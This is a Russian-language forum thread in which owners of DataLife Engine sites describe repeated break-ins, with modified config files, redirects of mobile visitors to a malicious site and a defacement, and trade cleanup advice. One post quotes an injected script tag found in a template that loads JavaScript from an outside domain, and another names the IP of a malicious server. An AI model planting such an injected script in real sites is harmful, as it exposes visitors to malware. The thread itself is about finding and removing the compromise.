Перейти к публикации

Рекомендованные сообщения

Это только временное решение. Нужно искать источник.

Как я понял это мобильный злокод. То есть при просмотре сайта с мобильных устройств загружается какая то хрень.

Ссылка на сообщение
Поделиться на других сайтах

пипец однако, та болезнь у всех сейчас, ресурс http://statuses.ws/ отправил в яндекс и гугл как вредоносный, так же проинформировал вендоры антивирусов.

ип сервака где стоит вредонос http://www.cy-pr.com/ip/46.165.197.69

Ссылка на сообщение
Поделиться на других сайтах

Такая же беда.. пассы сменил от БД,фтп,админки в этот же вечер 5 файлов были вновь изменены engine.php, init.php, dbconfig.php, config.php, index.php может и еще какие - возможно просто не увидел.

Теперь встает вопрос не отобразит ли яндекс все сайты, которые редиректят на этот statuses.ws как потенциально опасные?

Ссылка на сообщение
Поделиться на других сайтах

Не помогают вышеописанные действия.

Заливают каждые 3 дня. Сегодня 12 число и снова залили только что. Все патчи применены.

Пароли меняли уже к чему только можно.

Может после взлома где-то руткит оставили?

  • Поддерживаю 1
Ссылка на сообщение
Поделиться на других сайтах

Что скажет

celsoft ? проблемы только на DLE сайтах, везде только об этом и пишут, где это самая дырочка или дыры ? Я вообще сижу один на сервере, из 3-х сайтов поломали 2, именно те, которые дле покупал у Вас, третий сайт на нуле с версией 9.7 и его не тронули!, раньше на нем тоже был Ваш двиг но потом решил обновиться нулом и вот решал уже все сайты обновлять у Вас а тут вот такое твориться.

Объясните, пожалуйста, что это такое ? фтп прогами не пользуюсь уже 3 года, с тех пор как ломали сервер пару раз и вот с тех пор опять 25, все патчи безопасности установлены, вот только последный установил после взлома - из за него так ломают ? хотя пишут на форумах, что всё стоит, все пароли меняют и всё опять повторяется! например читайте тут

http://forum.searchengines.ru/showthread.php?t=764551&page=5 . Что правда, я как удалил эти коды, поставил последный патч, поменяял пароли и пока что 4 дня держусь...

Ссылка на сообщение
Поделиться на других сайтах

Что скажет celsoft ? проблемы только на DLE сайтах, везде только об этом и пишут, где это самая дырочка или дыры ?

Если после установки последнего патча не было взломов, в чем тогда вопрос?

Ссылка на сообщение
Поделиться на других сайтах

Если после установки последнего патча не было взломов, в чем тогда вопрос?

Вопрос в том, что пока не ясно как взломали сайты, вот Вы знаете причину ? помоемому вопрос понятный - где дыра ? выше писал что прошло 4 дня но не недели или года и хочется выяснить решена ли моя проблема с сайтами или нет, нужно всё-же выяснить причину.

Ссылка на сообщение
Поделиться на других сайтах

Что скажет celsoft ? проблемы только на DLE сайтах, везде только об этом и пишут, где это самая дырочка или дыры ?

Если после установки последнего патча не было взломов, в чем тогда вопрос?

Патчи бесполезны, они не помогают

Ссылка на сообщение
Поделиться на других сайтах

Что скажет celsoft ? проблемы только на DLE сайтах, везде только об этом и пишут, где это самая дырочка или дыры ?

Если после установки последнего патча не было взломов, в чем тогда вопрос?

Патчи бесполезны, они не помогают

А тут точно не скажешь, виновен скрипт, либо серверное ПО.

Нужно логи смотреть.

Изменено пользователем Japonec
Ссылка на сообщение
Поделиться на других сайтах

Патчи бесполезны, они не помогают

Не хочу сглазить но у меня пока всё тихо. Вы один на сервере сидите ? меняете ли пароли сервера и.т.п ? а может быть вам еще и шелл залили.

Мне на 2-х файлах прописали код на дбконфиг и на конфиг, антивирус зеон больше никаких изменения на сервере не показал, я еще права на файл конфиг поставил 644, да и ночью сегодня обновил ПО сервера так и пока не понял точной причины взлома и именно за этим я и пришел сюда...

Ссылка на сообщение
Поделиться на других сайтах

Паникёры блин, если на ваш сервер проникли то бекдор может быть где угодно (бекдор может состоять из оной строчки), могли и сервак ваш порутать.

Как устранял на своём серваке

1. сделал бекап базы и файлов (файлы сохранил что бы проанализировать бекдоры если найдётся), поменял пароль к mysql и ftp

2. скачал с офф сайта движок установил

3. востановил базу, поменял пороли всех админов и супер модераторов

4. на все PHP, файлы шаблона и JS поставил права только на чтение (при этом апач запускается с правами www-data)

5. в корень phpmyadmin добавил .htaccess с Basic auth

после этого зловреда не замечалось

Изменено пользователем Old_chekist
Ссылка на сообщение
Поделиться на других сайтах

Slavchik.ru, http://dle-news.ru/bags/v97/1538-patchi-bezopasnosti-dlya-versiy-97-i-nizhe.html

  • Поддерживаю 1
Ссылка на сообщение
Поделиться на других сайтах

Обновил двиг с заменой всех файлов + последние патчи. Удалил все старые и не нужные файлы + файлы от старых модулей, которые уже давно не используются. Выставил заново и правильно все права доступа на файлы и папки, а на htpaccess отдельно права - 444. Поменял все пароли к БД и руту. 4 дня прошло - пока полет нормальный.

Ссылка на сообщение
Поделиться на других сайтах

Ещё раз подскажите для параноиков. Какие права и на какие файлы можно выставить, чтобы максимально затруднить их изменение и не навредить функционалу самого движка.

В панели админки никаких замечаний нет. Но дума есть ещё файлы, на которые нужно права поменять в целях безопасности

Ссылка на сообщение
Поделиться на других сайтах

Ну вот вчера принял все меры безопасности, сегодня утром вижу такую картину: все файлы одного из сайтов полностью удалил, на втором же оставили index.php c посланием

<h1>Передавай привет школьника с серча, это во первых.

Во вторых ну не тема вы дети ищете багу.

А пока смотрим фильм, в поисках баги v 3.0 ^^)</h1>

Ссылка на сообщение
Поделиться на других сайтах

Ну вот вчера принял все меры безопасности, сегодня утром вижу такую картину: все файлы одного из сайтов полностью удалил, на втором же оставили index.php c посланием

<h1>Передавай привет школьника с серча, это во первых.

Во вторых ну не тема вы дети ищете багу.

А пока смотрим фильм, в поисках баги v 3.0 ^^)</h1>

Он походу сам школьник и в слове *уй делает 3 ошибки или же вообще туда не ходил

Ссылка на сообщение
Поделиться на других сайтах

С утра обнаружил в main.tpl на сервере строку

<script language='javascript' type='text/javascript' src='http://alemobile.ru/963qlrfrdi388sjvrq9el019n159djyt'></script>

Тоже взлом?

Ссылка на сообщение
Поделиться на других сайтах

С утра обнаружил в main.tpl на сервере строку Тоже взлом?

Если вы ее сами не ставили то возможно. Смотрите в админпанели в разделе "Список действий в админпанели" кто нибудь из администраторов редактировал шаблоны или нет.

Ссылка на сообщение
Поделиться на других сайтах

Так я и не понял, разработчик таблетку придумал или так и будем каждый день руками чистить?

И вот еще http://forum.antichat.ru/showpost.php?p=3396992&postcount=259

Изменено пользователем varvar
Ссылка на сообщение
Поделиться на других сайтах
Так я и не понял, разработчик таблетку придумал или так и будем каждый день руками чистить?
Если у вас руки из Жо..ы растут, то да, будете. За ваш сайт отвечаете только вы. если вы установили все патчи безопасности и у вас ломают сайт, то вывод логичен, дырка у вас в доступах или серверном по. Но думать головой стало не модно, я смотрю. ставьте нормальные пароли на доступы фтп, бд, защищайте свой сайт, это только ваш сайт и ничей больше
Ссылка на сообщение
Поделиться на других сайтах

Так я и не понял, разработчик таблетку придумал или так и будем каждый день руками чистить? И вот еще http://forum.anticha...2&postcount=259

http://dle-news.ru/bags/v97/1547-patchi-bezopasnosti-dlya-versiy-97-i-nizhe.html

Ссылка на сообщение
Поделиться на других сайтах

Так я и не понял, разработчик таблетку придумал или так и будем каждый день руками чистить?
Если у вас руки из Жо..ы растут, то да, будете. За ваш сайт отвечаете только вы. если вы установили все патчи безопасности и у вас ломают сайт, то вывод логичен, дырка у вас в доступах или серверном по. Но думать головой стало не модно, я смотрю. ставьте нормальные пароли на доступы фтп, бд, защищайте свой сайт, это только ваш сайт и ничей больше

Вы хотите сказать что у всех кто здесь проблемы в серверном ПО или паролями ftp ?

В ДЛЕ есть дыра и это факт

И не надо никого оскорблять на форуме.

Кстати вот ещё одну дыру просекли

http://forum.antichat.ru/showpost.php?p=3396992&postcount=259

Изменено пользователем dampel
Ссылка на сообщение
Поделиться на других сайтах

Так я и не понял, разработчик таблетку придумал или так и будем каждый день руками чистить?
Если у вас руки из Жо..ы растут, то да, будете. За ваш сайт отвечаете только вы. если вы установили все патчи безопасности и у вас ломают сайт, то вывод логичен, дырка у вас в доступах или серверном по. Но думать головой стало не модно, я смотрю. ставьте нормальные пароли на доступы фтп, бд, защищайте свой сайт, это только ваш сайт и ничей больше

Руки из ж... растут у тебя. ТЫ в инте глянь у огромного количества людей есть проблема на разных серверах и разных версиях как я понял данный патч не помогает. Но ты ж не читатель ты лизатель видимо.

Ссылка на сообщение
Поделиться на других сайтах
Гость
Эта тема закрыта для публикации сообщений.
×
×
  • Создать...